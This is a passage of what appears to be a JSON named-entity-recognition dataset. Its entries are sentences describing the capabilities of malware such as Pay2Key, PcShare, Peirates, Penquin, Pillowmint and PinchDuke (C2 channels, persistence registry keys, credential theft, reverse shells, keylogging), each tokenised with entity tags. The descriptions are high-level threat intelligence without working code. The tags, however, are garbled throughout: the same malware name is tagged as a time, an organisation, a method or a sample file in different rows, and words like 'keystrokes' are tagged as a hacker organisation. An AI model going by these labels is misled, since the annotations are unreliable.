- "remote", - "attackers", - "can", - "retrieve", - "lists", - "of", - "running", - "processes." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pasam", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "retrieve", - "information", - "such", - "as", - "hostname", - "and", - "free", - "disk", - "space." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pass-The-Hash", - "Toolkit", - "can", - "perform", - "pass", - "the", - "hash." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pay2Key", - "has", - "used", - "RSA", - "encrypted", - "communications", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pay2Key", - "can", - "encrypt", - "data", - "on", - "victim's", - "machines", - "using", - "RSA", - "and", - "AES", - "algorithms", - "in", - "order", - "to", - "extort", - "a", - "ransom", - "payment", - "for", - "decryption." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pay2Key", - "can", - "remove", - "its", - "log", - "file", - "from", - "disk." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pay2Key", - "has", - "designated", - "machines", - "in", - "the", - "compromised", - "network", - "to", - "serve", - "as", - "reverse", - "proxy", - "pivot", - "points", - "to", - "channel", - "communications", - "with", - "C2." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pay2Key", - "has", - "sent", - "its", - "public", - "key", - "to", - "the", - "C2", - "server", - "over", - "TCP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pay2Key", - "can", - "stop", - "the", - "MS", - "SQL", - "service", - "at", - "the", - "end", - "of", - "the", - "encryption", - "process", - "to", - "release", - "files", - "locked", - "by", - "the", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pay2Key", - "has", - "the", - "ability", - "to", - "gather", - "the", - "hostname", - "of", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pay2Key", - "can", - "identify", - "the", - "IP", - "and", - "MAC", - "addresses", - "of", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "has", - "created", - "the", - "`HKCU\\\\Software\\\\Classes\\\\CLSID\\\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\\\InprocServer32`", - "Registry", - "key", - "for", - "persistence." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "can", - "collect", - "files", - "and", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "has", - "decrypted", - "its", - "strings", - "by", - "applying", - "a", - "XOR", - "operation", - "and", - "a", - "decompression", - "using", - "a", - "custom", - "implemented", - "LZM", - "algorithm." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "PcShare", - "has", - "been", - "encrypted", - "with", - "XOR", - "using", - "different", - "32-long", - "Base16", - "strings", - "and", - "compressed", - "with", - "LZW", - "algorithm." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "can", - "upload", - "files", - "and", - "information", - "from", - "a", - "compromised", - "host", - "to", - "its", - "C2", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "has", - "deleted", - "its", - "files", - "and", - "components", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "has", - "used", - "an", - "invalid", - "certificate", - "in", - "attempt", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "has", - "the", - "ability", - "to", - "capture", - "keystrokes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "PcShare", - "has", - "been", - "named", - "`wuauclt.exe`", - "to", - "appear", - "as", - "the", - "legitimate", - "Windows", - "Update", - "AutoUpdate", - "Client." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "can", - "delete", - "its", - "persistence", - "mechanisms", - "from", - "the", - "registry." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "has", - "used", - "a", - "variety", - "of", - "Windows", - "API", - "functions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "can", - "obtain", - "a", - "list", - "of", - "running", - "processes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "PcShare", - "payload", - "has", - "been", - "injected", - "into", - "the", - "`logagent.exe`", - "and", - "`rdpclip.exe`", - "processes." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "can", - "search", - "the", - "registry", - "files", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "has", - "used", - "`rundll32.exe`", - "for", - "execution." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "can", - "take", - "screen", - "shots", - "of", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "can", - "obtain", - "the", - "proxy", - "settings", - "of", - "a", - "compromised", - "machine", - "using", - "`InternetQueryOptionA`", - "and", - "its", - "IP", - "address", - "by", - "running", - "`nslookup", - "myip.opendns.comresolver1.opendns.com\\r\\n`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "PcShare", - "can", - "capture", - "camera", - "video", - "as", - "part", - "of", - "its", - "collection", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "has", - "used", - "HTTP", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PcShare", - "can", - "execute", - "`cmd`", - "commands", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pcexter", - "has", - "been", - "distributed", - "and", - "executed", - "as", - "a", - "DLL", - "file", - "named", - "Vspmsg.dll", - "via", - "DLL", - "side-loading." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Pcexter", - "can", - "upload", - "files", - "from", - "targeted", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pcexter", - "can", - "upload", - "stolen", - "files", - "to", - "OneDrive", - "storage", - "accounts", - "via", - "HTTP", - "`POST`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pcexter", - "has", - "the", - "ability", - "to", - "search", - "for", - "files", - "in", - "specified", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peirates", - "can", - "use", - "stolen", - "service", - "account", - "tokens", - "to", - "perform", - "its", - "operations.", - "It", - "also", - "enables", - "adversaries", - "to", - "switch", - "between", - "valid", - "service", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peirates", - "can", - "use", - "stolen", - "service", - "account", - "tokens", - "to", - "perform", - "its", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peirates", - "can", - "query", - "the", - "query", - "AWS", - "and", - "GCP", - "metadata", - "APIs", - "for", - "secrets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peirates", - "can", - "list", - "AWS", - "S3", - "buckets." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peirates", - "can", - "query", - "the", - "Kubernetes", - "API", - "for", - "secrets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peirates", - "can", - "use", - "`kubectl`", - "or", - "the", - "Kubernetes", - "API", - "to", - "run", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peirates", - "can", - "enumerate", - "Kubernetes", - "pods", - "in", - "a", - "given", - "namespace." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peirates", - "can", - "dump", - "the", - "contents", - "of", - "AWS", - "S3", - "buckets.", - "It", - "can", - "also", - "retrieve", - "service", - "account", - "tokens", - "from", - "kOps", - "buckets", - "in", - "Google", - "Cloud", - "Storage", - "or", - "S3." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peirates", - "can", - "deploy", - "a", - "pod", - "that", - "mounts", - "its", - "node’s", - "root", - "file", - "system,", - "then", - "execute", - "a", - "command", - "to", - "create", - "a", - "reverse", - "shell", - "on", - "the", - "node." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peirates", - "can", - "gain", - "a", - "reverse", - "shell", - "on", - "a", - "host", - "node", - "by", - "mounting", - "the", - "Kubernetes", - "hostPath." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peirates", - "can", - "initiate", - "a", - "port", - "scan", - "against", - "a", - "given", - "IP", - "address." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peirates", - "gathers", - "Kubernetes", - "service", - "account", - "tokens", - "using", - "a", - "variety", - "of", - "techniques." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "can", - "encrypt", - "communications", - "using", - "the", - "BlowFish", - "algorithm", - "and", - "a", - "symmetric", - "key", - "exchanged", - "with", - "Diffie", - "Hellman." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Penquin", - "can", - "use", - "Cron", - "to", - "create", - "periodic", - "and", - "pre-scheduled", - "background", - "jobs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "has", - "encrypted", - "strings", - "in", - "the", - "binary", - "for", - "obfuscation." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "can", - "execute", - "the", - "command", - "code", - "<code>do_upload</code>", - "to", - "send", - "files", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "can", - "delete", - "downloaded", - "executables", - "after", - "running", - "them." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "can", - "use", - "the", - "command", - "code", - "<code>do_vslist</code>", - "to", - "send", - "file", - "names,", - "size,", - "and", - "status", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "can", - "remove", - "strings", - "from", - "binaries." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "can", - "execute", - "the", - "command", - "code", - "<code>do_download</code>", - "to", - "retrieve", - "remote", - "files", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "can", - "add", - "the", - "executable", - "flag", - "to", - "a", - "downloaded", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "has", - "mimicked", - "the", - "Cron", - "binary", - "to", - "hide", - "itself", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "can", - "sniff", - "network", - "traffic", - "to", - "look", - "for", - "packets", - "matching", - "specific", - "conditions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Penquin", - "C2", - "mechanism", - "is", - "based", - "on", - "TCP", - "and", - "UDP", - "packets." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "installs", - "a", - "`TCP`", - "and", - "`UDP`", - "filter", - "on", - "the", - "`eth0`", - "interface." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "can", - "report", - "the", - "file", - "system", - "type", - "and", - "disk", - "space", - "of", - "a", - "compromised", - "host", - "to", - "C2." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "can", - "report", - "the", - "IP", - "of", - "the", - "compromised", - "host", - "to", - "attacker", - "controlled", - "infrastructure." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "will", - "connect", - "to", - "C2", - "only", - "after", - "sniffing", - "a", - "\"magic", - "packet\"", - "value", - "in", - "TCP", - "or", - "UDP", - "packets", - "matching", - "specific", - "conditions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Penquin", - "can", - "execute", - "remote", - "commands", - "using", - "bash", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Peppy", - "has", - "the", - "ability", - "to", - "automatically", - "exfiltrate", - "files", - "and", - "keylogs." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Peppy", - "can", - "identify", - "specific", - "files", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peppy", - "can", - "download", - "and", - "execute", - "remote", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Peppy", - "can", - "log", - "keystrokes", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peppy", - "can", - "take", - "screenshots", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peppy", - "can", - "use", - "HTTP", - "to", - "communicate", - "with", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Peppy", - "has", - "the", - "ability", - "to", - "execute", - "shell", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Pillowmint", - "has", - "used", - "a", - "malicious", - "shim", - "database", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pillowmint", - "has", - "encrypted", - "stolen", - "credit", - "card", - "information", - "with", - "AES", - "and", - "further", - "encoded", - "it", - "with", - "Base64." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pillowmint", - "has", - "used", - "the", - "NtQueueApcThread", - "syscall", - "to", - "inject", - "code", - "into", - "svchost.exe." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pillowmint", - "can", - "uninstall", - "the", - "malicious", - "service", - "from", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pillowmint", - "has", - "collected", - "credit", - "card", - "data", - "using", - "native", - "API", - "functions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pillowmint", - "has", - "been", - "decompressed", - "by", - "included", - "shellcode", - "prior", - "to", - "being", - "launched." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pillowmint", - "has", - "deleted", - "the", - "filepath", - "<code>%APPDATA%\\Intel\\devmonsrv.exe</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Pillowmint", - "has", - "stored", - "a", - "compressed", - "payload", - "in", - "the", - "Registry", - "key", - "<code>HKLM\\SOFTWARE\\Microsoft\\DRM</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pillowmint", - "has", - "modified", - "the", - "Registry", - "key", - "<code>HKLM\\SOFTWARE\\Microsoft\\DRM</code>", - "to", - "store", - "a", - "malicious", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pillowmint", - "has", - "used", - "multiple", - "native", - "Windows", - "APIs", - "to", - "execute", - "and", - "conduct", - "process", - "injections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Pillowmint", - "has", - "been", - "compressed", - "and", - "stored", - "within", - "a", - "registry", - "key.", - "Pillowmint", - "has", - "also", - "obfuscated", - "the", - "AES", - "key", - "used", - "for", - "encryption." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pillowmint", - "has", - "used", - "a", - "PowerShell", - "script", - "to", - "install", - "a", - "shim", - "database." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pillowmint", - "can", - "iterate", - "through", - "running", - "processes", - "every", - "six", - "seconds", - "collecting", - "a", - "list", - "of", - "processes", - "to", - "capture", - "from", - "later." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pillowmint", - "has", - "used", - "shellcode", - "which", - "reads", - "code", - "stored", - "in", - "the", - "registry", - "keys", - "<code>\\REGISTRY\\SOFTWARE\\Microsoft\\DRM</code>", - "using", - "the", - "native", - "Windows", - "API", - "as", - "well", - "as", - "read", - "<code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces</code>", - "as", - "part", - "of", - "its", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PinchDuke", - "steals", - "credentials", - "from", - "compromised", - "hosts.", - "PinchDuke's", - "credential", - "stealing", - "functionality", - "is", - "believed", - "to", - "be", - "based", - "on", - "the", - "source", - "code", - "of", - "the", - "Pinch", - "credential", - "stealing", - "malware", - "(also", - "known", - "as", - "LdPinch).", - "Credentials", - "targeted", - "by", - "PinchDuke", - "include", - "ones", - "associated", - "with", - "many", - "sources", - "such", - "as", - "The", - "Bat!,", - "Yahoo!,", - "Mail.ru,", - "Passport.Net,", - "Google", - "Talk,", - "and", - "Microsoft", - "Outlook." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-SecTeam", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PinchDuke", - "steals", - "credentials", - "from", - "compromised", - "hosts.", - "PinchDuke's", - "credential", - "stealing", - "functionality", - "is", - "believed", - "to", - "be", - "based", - "on", - "the", - "source", - "code", - "of", - "the", - "Pinch", - "credential", - "stealing", - "malware", - "(also", - "known", - "as", - "LdPinch).", - "Credentials", - "targeted", - "by", - "PinchDuke", - "include", - "ones", - "associated", - "with", - "many", - "sources", - "such", - "as", - "Netscape", - "Navigator,", - "Mozilla", - "Firefox,", - "Mozilla", - "Thunderbird,", - "and", - "Internet", - "Explorer." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "B-Tool", - "B-Way", - "B-Tool", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "PinchDuke", - "collects", - "user", - "files", - "from", - "the", - "compromised", - "host", - "based", - "on", - "predefined", - "file", - "extensions." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PinchDuke", - "searches", - "for", - "files", - "created", - "within", - "a", - "certain", - "timeframe", - "and", - "whose", - "file", - "extension", - "matches", - "a", - "predefined", - "list." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PinchDuke", - "steals", - "credentials", - "from", - "compromised", - "hosts.", - "PinchDuke's", - "credential", - "stealing", - "functionality", - "is", - "believed", - "to", - "be", - "based", - "on", - "the", - "source", - "code", - "of", - "the", - "Pinch", - "credential", - "stealing", - "malware", - "(also", - "known", - "as", - "LdPinch).", - "Credentials", - "targeted", - "by", - "PinchDuke", - "include", - "ones", - "associated", - "many", - "sources", - "such", - "as", - "WinInet", - "Credential", - "Cache,", - "and", - "Lightweight", - "Directory", - "Access", - "Protocol", - "(LDAP)." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "PinchDuke", - "gathers", - "system", - "configuration", - "information." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "PinchDuke", - "transfers", - "files", - "from", - "the", - "compromised", - "host", - "via", - "HTTP", - "or", - "HTTPS", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", 